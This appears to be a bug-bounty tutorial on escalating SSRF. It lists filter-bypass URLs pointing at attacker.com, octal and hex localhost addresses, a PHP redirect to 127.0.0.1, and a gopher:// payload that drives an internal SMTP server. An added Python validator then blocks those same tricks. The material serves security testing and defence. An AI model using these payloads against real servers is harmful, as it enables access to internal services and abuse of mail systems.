Since I've seen so many people ask what to do once they get a request back to their collaborator instance, I created this flowchart to present what I usually do to test and escalate SSRFs.
I am sure there are a few other ways of bypassing SSRF filters that I did not include; this flowchart shows the ones I personally test against.
DNS-only queries are rarely exploitable and should never be reported without additional impact.
When using your listener as an email domain (test@burpcollaborator.com), receiving SMTP and DNS queries is not a sign of SSRF. That is just how SMTP works and should never be reported. There have been edge cases where the payload test@burpcollaborator.com led to HTTP requests; if that's the case, SSRF might be possible. See d0nut's Piercing the Veal, story 4.
Some common whitelist filter bypasses I test against:
https://target.com@attacker.com
https://attacker.com/target.com
https://target.com.attacker.com
Inspired by EdOverflow's blog post on exploiting Ruby's Resolv:
http://0177.1:22/
http://0x7f.1:22/
http://127.000.001:22/
See more at PayloadsAllTheThings SSRF
The value passed to the Location header is the URL your page will redirect to. You can also try status codes other than 301, such as 302, 303 and 307.
<?php
// Redirect the victim's fetcher to the internal target; the third argument is the HTTP status code.
header("Location: http://127.0.0.1", TRUE, 301);
exit();
?>
Inspired by d0nut's Piercing the Veal:
<?php
// SMTP dialogue to be sent raw over gopher:// (everything after "_" is written to the socket as-is)
$commands = array(
'HELO victim.com',
'MAIL FROM: <admin@victim.com>',
'RCPT To: <sxcurity@oou.us>',
'DATA',
'Subject: @sxcurity!',
'Corben was here, woot woot!',
'.'
);
// %0A is a URL-encoded newline, so each command lands on its own line once the URL is decoded
$payload = implode('%0A', $commands);
// host "0" resolves to localhost; port 25 is SMTP
header('Location: gopher://0:25/_'.$payload);
?>
Payload taken from PayloadsAllTheThings SSRF
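The other side of all of the above, as an added example that is not code from the original post or from any of the referenced write-ups: a small allowlist validator for a server-side fetcher that rejects the whitelist bypass shapes listed earlier (userinfo, path and subdomain tricks, octal/hex/short IP literals), refuses non-HTTP schemes such as gopher://, and re-validates every redirect hop instead of letting the HTTP client follow Location blindly. The names ALLOWED_HOSTS, parse_legacy_ipv4, validate_url, fetch and make_table_resolver, the sample allowlist and the sample addresses are this example's own assumptions.

```python
"""Allowlist validation for a server-side URL fetcher (added example)."""
import ipaddress
import socket
from urllib.parse import urlsplit, urljoin

ALLOWED_HOSTS = {"target.com", "www.target.com"}  # constructed allowlist
ALLOWED_SCHEMES = {"http", "https"}                # no gopher://, file://, dict://
ALLOWED_PORTS = {None, 80, 443}                   # None = scheme default
REDIRECT_CODES = {301, 302, 303, 307, 308}


def parse_legacy_ipv4(host):
    """Canonicalise the lenient inet_aton forms (octal, hex, fewer than four
    parts, plain integer) to dotted-quad, or return None if host is not one.
    This is what makes 0177.1, 0x7f.1 and 127.000.001 all mean 127.0.0.1."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        try:
            if part.lower().startswith("0x"):
                values.append(int(part[2:], 16))
            elif len(part) > 1 and part.startswith("0"):
                values.append(int(part, 8))
            else:
                values.append(int(part, 10))
        except ValueError:
            return None
    *leading, last = values
    remaining = 4 - len(leading)               # the last part fills the rest
    if any(v > 255 for v in leading) or last >= 256 ** remaining:
        return None
    n = 0
    for v in leading:
        n = (n << 8) | v
    n = (n << (8 * remaining)) | last
    return str(ipaddress.IPv4Address(n))


def resolve_all(host):
    """Default resolver: every address the system resolver returns for host."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return [ipaddress.ip_address(i[4][0].split("%")[0]) for i in infos]


def make_table_resolver(table):
    """Resolver backed by a dict {host: [addresses]} for offline testing."""
    return lambda host: [ipaddress.ip_address(a) for a in table.get(host, [])]


def validate_url(url, resolver=resolve_all):
    """Return (ok, reason). Exact allowlist matching on the parsed hostname
    defeats the userinfo/path/subdomain tricks; rejecting every IP literal
    covers the non-standard forms; resolving and checking is_global catches
    an allowed name that points at internal address space."""
    try:
        parts = urlsplit(url)
        port = parts.port                      # raises ValueError on a bad port
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo present"       # https://target.com@attacker.com
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False, "no host"
    try:
        ipaddress.ip_address(host)
        literal = True
    except ValueError:
        literal = parse_legacy_ipv4(host) is not None
    if literal:
        return False, "IP literal not allowed"
    if host not in ALLOWED_HOSTS:
        return False, "host not in allowlist"  # attacker.com/target.com, target.com.attacker.com
    if port not in ALLOWED_PORTS:
        return False, "port not allowed"
    addrs = resolver(host)
    if not addrs:
        return False, "host did not resolve"
    for addr in addrs:
        if not addr.is_global:
            return False, "resolves to non-public address %s" % addr
    return True, "ok"


def fetch(url, opener, resolver=resolve_all, max_hops=3):
    """Fetch url with redirects handled here. opener(url) must return
    (status, headers, body) and must NOT follow redirects itself; every
    hop goes back through validate_url before the next request."""
    for _ in range(max_hops + 1):
        ok, reason = validate_url(url, resolver)
        if not ok:
            raise ValueError("blocked %s: %s" % (url, reason))
        status, headers, body = opener(url)
        if status in REDIRECT_CODES:
            url = urljoin(url, headers.get("Location", ""))
            continue
        return body
    raise ValueError("too many redirects")


if __name__ == "__main__":
    demo = make_table_resolver({"target.com": ["93.184.216.34"]})  # constructed
    for u in ("https://target.com/ok", "https://target.com@attacker.com",
              "http://0177.1:22/", "gopher://0:25/_HELO"):
        print(u, "->", validate_url(u, demo))
```

The resolve-then-connect step still leaves a window for DNS rebinding (two A records, or a short-TTL record that changes between the check and the request), so a production client should connect to the address that passed validation rather than letting the HTTP library resolve the name a second time.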
Orange Tsai's Black Hat presentation explains this perfectly (PDF slides and YouTube presentation).
I also highly recommend watching LiveOverflow's video (PHP include and bypass SSRF protection with two DNS A records), which discusses URL parsing inconsistencies while also touching on DNS rebinding.